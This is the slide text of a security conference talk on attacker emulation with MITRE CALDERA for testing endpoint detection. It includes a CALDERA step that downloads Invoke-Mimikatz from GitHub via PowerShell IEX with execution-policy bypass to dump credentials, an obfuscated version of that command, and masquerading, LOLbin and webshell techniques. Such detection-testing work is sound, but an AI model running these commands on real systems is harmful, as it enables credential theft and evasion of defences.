The Imitation Game: Attacker Emulation

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Who dis?

- BSides London newbie
- Endpoint Threat Detection @ PwC

What's next?

- 1. Why
- 2. How
- 3. Cool stuff



Attacker emulation

Attacker Emulation: Do what an attacker would do

Attacker emulation (2) ... but why?

- 1. **Test** your own detection capability (with a realistic attack model)
- 2. **Research** and test new attacker techniques
- 3. **Showing off** (we all want to)

Attacker emulation mode

- Post-compromise
- Manner: Automated vs manual
 - Automated saves time, easy to rerun
- **Scope**: Atomatic vs end-to-end [0]
 - Atomic: 'BAT file'
 - Chained
 - End-to-end: links actions together, more realistic

Attacker emulation mode: a trade-off





Source: https://xkcd.com/927/

Tools

List of open-source ATT&CK[™] framework emulation tools

- Red Canary Atomic Red [1]
- Uber Metta [2]
- MITRE CALDERA [3]
- Endgame Red Team Automation [4]
- Guardicore Infection Monkey [5]
- NextronSystem APTSimulator [6]
- RE:TERNAL [7]
- ... and many more

- Blue Team Training Toolkit (BT3) [8]
- DumpsterFire [9]
- AutoTTP [10]
- MITRE/NSA Unfetter [11]
- MATE [12]
- Praetorian Purple Team Automation [13]

Tools (2)

Vendor	Product	Automated?	Dynamic?	Supported Platforms
Red Canary	Atomic Red	×	×	丰 👃 🧉
Uber	Metta	~	×	📢 👃 🥌
MITRE	CALDERA 2.0	~	✓/X	📢 👃 🥌
MITRE	CALDERA 1.0	~	~	
Endgame	Red Team Automation	\checkmark	\checkmark	

Tools (3) Finding your Eve

- What are you trying to achieve?
- Goal?
- Scope?
- Realistic?
- Easy to maintain?
 - Isolated actions are easier to create and update

MITRE CALDERA

- Open-source research project[14] by MITRE
- Comes with several actions out of the box
- Distinguishing features:
 - 1. 'Actions' written in **Python**
 - 2. Works with **pre and post conditions**
 - 3. Comes with *heuristic planner*, linking actions together

Typical set up





Persistence w/ rundll32

Copy file

Exfiltration using git

Delete Event Logs

PsExec

Stage data

Mimikatz

Sample workflow (2)



Typical CALDERA class

- Pre/post conditions
- The action itself
- Clean-up

Typical CALDERA class (2)

- Pre/post conditions
 - If you have admin rights, this can give you credentials
- The action itself
 - Run Mimikatz
- Clean-up
 - Remove obfuscated Mimikatz, logs

Typical CALDERA class (3)

```
class DumpCreds(Step):
    display_name = "dump_creds"
    summary = "Run Invoke-Mimikatz to obtain credentials."
    attack_mapping = [('T1003', 'Credential Access')]
```

@staticmethod

```
async def action(operation, rat, host, software, file_g, process_g, software_g):
```

```
# Step 1: run Mimikatz in memory
MIMIKATZ_URL = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016f(...)67b3/Exfiltration/Invoke-Mimikatz.ps1"
ps_parameters = ['powershell.exe', '-exec', 'bypass', '-C', 'IEX(IWR \'{}\'); Invoke-Mimikatz -DumpCreds'.format(MIMIKATZ_URL)]
```

credentials = (await operation.execute_shell_command(rat, command.CommandLine(ps_parameters), DumpCreds.parser))

```
# Step 2: parse credentials
for cred in credentials:
    # Generate User object
    user_obj = await user_g({'username': cred['username'], 'is_group': False})
    # Generate Credential object
    await credential_g({'password': cred['password'], 'found_on_host': rat.host, 'user': user_obj})
```

return True

@staticmethod
 async def cleanup(cleaner, host):



- Selecting your attacker
- **Detection** (detecting the right thing, bad 'learning' mechanisms)
- **Realism** (techniques, timing, propagation)

Beyond standard CALDERA

Focus on three extensions:

- 1. LOLbins/LOLbas implementation (T1218, T1216, ...)
- 2. Common obfuscation techniques (T1140)
- 3. Masquerading techniques (T1036)

1: LOLbins

Beyond standard CALDERA: LOLbins

- **LOLbins**: why bring your own tools if you can use preinstalled ones? (v)/
- Various options [15]
 - Common: PowerShell, wscript/cscript, mshta
 - Other examples: regasm, xwizards, msbuild, pubprn.vbs



Beyond standard CALDERA: LOLbins (2)

- **Precondition**: awareness of command to run
- **Postcondition**: command will have executed



Beyond standard CALDERA: LOLbins (3)

Example:

- **Precondition**: the command evil.exe needs to be run
- Action: use the regasm.exe /u LOLbin
- **Postcondition**: the command evil.exe successfully ran



2: Obfuscation

Beyond standard CALDERA: Obfuscate^{T1140}

- Hide keywords that might trigger rule-based systems
- Various techniques available [16], e.g.
 - Concatenation "Hell"+"o wo"+"rld"
 - Escaping "H`e`llo W`orld"
 - Format string "{1}{0}"-f"o, world", "Hell"
 - Base64 encode
- However: can easily be detected by entropy analysis

'{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" .b64decode() 'Obf'+'usca'+'te' '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ pbmc=".b64decode() 'Obf'+'usca'+'te' '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' lace"@","a" "T2JmdXNjYXRpbmc=".b64decode() '0bf'+'usca'+'te' '{}{}'-f'0bfus','catio "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'Obf'+'usca'+'te' '{}{ c""^ated' "Obfus<mark>@ct0r"-replace"@","a" "T</mark>2JmdXNjYXRpbmc="**.b64decode()** 'Obf'+'usca'+ 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode() Obfus','cation' 'Ob`fus`c""^ated' "Obfus<mark>@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b6</mark> `}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpb '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" .b64decode() 'Obf'+'usca'+'te' '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ pbmc=".b64decode() 'Obf'+'usca'+'te' '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' lace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'Obf'+'usca'+'te' '{}{}'-f'Obfus','cation "Obfus@ctOr"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'Obf'+'usca'+'te' '{} c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'Obf'+'usca'+ n' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'O cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b6 {}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ctOr"-replace"@","a" "T2JmdXNjYXRpb '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" .b64decode() '0bf'+'usca'+'te' '{}{}'-f'0bfus','cation' '0b`fus`c""^ated' "0bfus@ pbmc=".b64decode() 'Obf'+'usca'+'te' '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' lace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'Obf'+'usca'+'te' '{}{}'-f'Obfus','cation "Obfus@ctOr"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'Obf'+'usca'+'te' '{}{ `c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'Obf'+'usca'+ n' 'Ob`fus`c""^ated' "Obfus<mark>@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode()</mark> 'O cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode bfus','cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b6 +{}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpb '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" .b64decode() 'Obf'+'usca'+'te' '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ pbmc=".b64decode() 'Obf'+'usca'+'te' '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' lace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'Obf'+'usca'+'te' '{}{}'-f'Obfus','catio "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'Obf'+'usca'+'te' '{}{ `c""^ated' "Obfus@ctOr"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'Obf'+'usca'+ n' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decod bfus','cation' 'Ob`fus`c""^ated' "Obfus<mark>@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b6</mark> {}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpb '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" '.b64decode() 'Obf'+'usca'+'te' '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ pbmc=".b64decode() 'Obf'+'usca'+'te' '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' lace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'Obf'+'usca'+'te' '{}{}'-f'Obfus','catio "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'Obf'+'usca'+'te' '{}{ `c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode() 'Obf'+'usca'+ .' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b64decode() Obfus','cation' 'Ob`fus`c""^ated' "Obfus<mark>@ct0r"-replace"@","a" "T2JmdXNjYXRpbmc=".b6</mark> }{}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a" "T2JmdXNjYXRpb '{}{}'-f'Obfus','cation' 'Ob`fus`c""^ated' "Obfus@ct0r"-replace"@","a"

Beyond standard CALDERA: Obfuscate^{T1140} (2)

Example:

• **Precondition**: this command needs to run:

powershell.exe /c "IEX (IEW https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/E
xfiltration/Invoke-Mimikatz.ps1);"

• Action:

1. Obfuscate command line using format string, e.g.

powershell.exe /c "i`e`x("""{27}{19}{37}{26}{23}{40}{21}{12}{33}{15}{5}{30}{10}{28}{3}{1}{0}{9}{11}{43}{20}{14}{7}{31}{22}{13}{24}
{6}{39}{42}{2}{17}{38}{36}{4}{18}{16}{32}{29}{8}{25}{35}{34}{41}""-f""Splo"",""ower"",""tion"",""ia/P"",""katz"",""om/
P"",""7b3/"",""7273"",""imik"",""it/4"",""Shel"",""c7a2"",""serc"",""16d9"",""1cd3"",""nt.c"",""'); "",""/In
v"","".ps1"",""IWR "",""c793"",""hubu"",""e17b"",""'e17b"",""Splo"",""atz "",""ps:/"",""IEX("",""IMAF"",""keM"",""ower"",""c5d8"",""Invo"",""onte"",""pCre"",""-Dum"",""Mimi"",""'htt"",""oke-"",""Exfi"",""Exfi"",""d
s"",""1cd3"",""016f"")"

- 2. Run command
- **Postcondition**: the command successfully ran

3: Masquerading

Beyond standard CALDERA: Masquerade^{T1036}

- Renamed copy of a legitimate utility
- Simple way to bypass rule systems







svchost.exe

e



Beyond standard CALDERA: Masquerade^{T1036} (2)

Example:

- **Precondition**: the command wscript.exe /e:jscript evil.js needs to be run
- Action:
 - 1. Copy wscript.exe to %appdata%/GoogleUpdate.exe
 - 2. Run GoogleUpdate.exe /e:jscript evil.js
- **Postcondition**: the command successfully ran

---- 🕸 C:\Windows\Temp\GoogleUpdate.exe /e:jscript evil.js

Plan

- **Stage 0**: Infect machine (outside scope)
- **Stage 1**: Discovery / Lateral Movement
- Stage 2: Execution
- Stage 3: Persistence
- (**Stage 4**: Cover Tracks)

Plan (2)

 Run Mimikatz Find administrators Find other machines Move to other machines 			 Download webserver Set up webshell Exfiltrate via webshell 		
Discovery / Lateral Movement	1	2	Execution		
Persistence	3	4	Cover tracks		
- Create autorup entry for webshell		- Cl	ear files registry keys etc. created by attack		
			- Clear mes, registry keys, etc. created by attack		

-

Putting it together Demo time!



Putting it together (2)

Step	Process	Goal	Artefacts	Additional Techniques	Relies on
1	powershell.exe	Run Mimikatz		Format string obfuscation	
2	powershell.exe	Find other computers		Direct to StdIn	
3	-	Prepare webshell			
4	certutil.exe	Download webserver ZIP	394nxk7klci7vh.exe	LOLBin	3
5	powershell.exe	Find administrators		Direct to StdIn	
6	commander.exe	Create persistence			
7	rundll32.exe	Extract / run webserver	UpdateDeamon.exe, g5f.sct, 4ebw1nk/*	Masquerading	4
8	usbwebserver.exe	Test webshell			4, 7
9	net.exe	Mount network share			1, 2, 5
10	xcopy.exe	Copy RAT	commander.exe		9

Aftermath

• The real challenge starts now

2019-05-17 14:12:54

- Device\HarddiskVolume1\Windows\System32\wininit.exe
 - L & \Device\HarddiskVolume1\Windows\System32\services.exe
 - I de "c:\Program Files\cagent\cagent.exe"
 - C:\commander.exe -f
 - undll32.exe advpack.dll,LaunchINFSection c:\\windows\\temp\\whl6.html,Outlook,1

[0734]-[execution]-[m]-rundll32_launched_against_remote_machine

Attacker Emulation going forward

- Community!
- Sharing CALDERA modules (like Metasploit)
- Industry standard

.. and let's remind ourselves

Attacker Emulation \neq silver bullet



- 1. Attacker emulation helps understand threats and your defences
- 2. Do attacker emulation the **right way**:
 - Make it random
 - Make it real
- 3. Doesn't have to be difficult!
- 4. **Community**-based sharing

Getting in touch

- Code and slides on github.com/wietze
- @Wietze on Twitter
- Email via wietze.beukema@pwc.com

Thank you

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